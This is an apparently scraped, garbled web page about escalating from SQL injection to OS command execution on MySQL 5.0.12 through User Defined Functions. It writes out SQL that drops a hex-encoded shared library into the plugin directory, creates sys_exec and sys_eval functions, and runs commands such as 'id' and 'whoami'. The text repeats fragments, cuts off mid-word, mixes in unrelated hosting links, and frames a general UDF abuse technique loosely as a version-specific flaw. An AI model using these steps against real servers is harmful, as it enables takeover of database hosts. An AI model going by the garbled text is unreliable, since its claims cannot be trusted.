SELECT @@version; If the return is 5.0.12 or 5.0.12-community , the system is vulnerable.
-- Execute a command, return the exit code SELECT sys_exec('id > /tmp/owned.txt'); -- Return the output of a command as a string SELECT sys_eval('whoami'); mysql 5.0.12 exploit
Introduction In the pantheon of database vulnerabilities, few have sparked as much quiet panic among system administrators as the privilege escalation attack against MySQL 5.0.12 . Released in 2005, this version of the world’s most popular open-source database contained a flaw in its User Defined Function (UDF) component that turned a standard SQL injection vulnerability into full operating system compromise. SELECT @@version; If the return is 5
CREATE FUNCTION sys_exec RETURNS INT SONAME 'exploit.so'; CREATE FUNCTION sys_eval RETURNS STRING SONAME 'exploit.so'; Suddenly, the attacker can run operating system commands: CREATE FUNCTION sys_exec RETURNS INT SONAME 'exploit
SELECT 0x7f454c460201010000000000000000000300... INTO DUMPFILE '/usr/lib/mysql/plugin/exploit.so'; (Note: The hex string represents a compiled shared library containing a sys_exec() function.)
US Multicraft
EU Multicraft
Aus Multicraft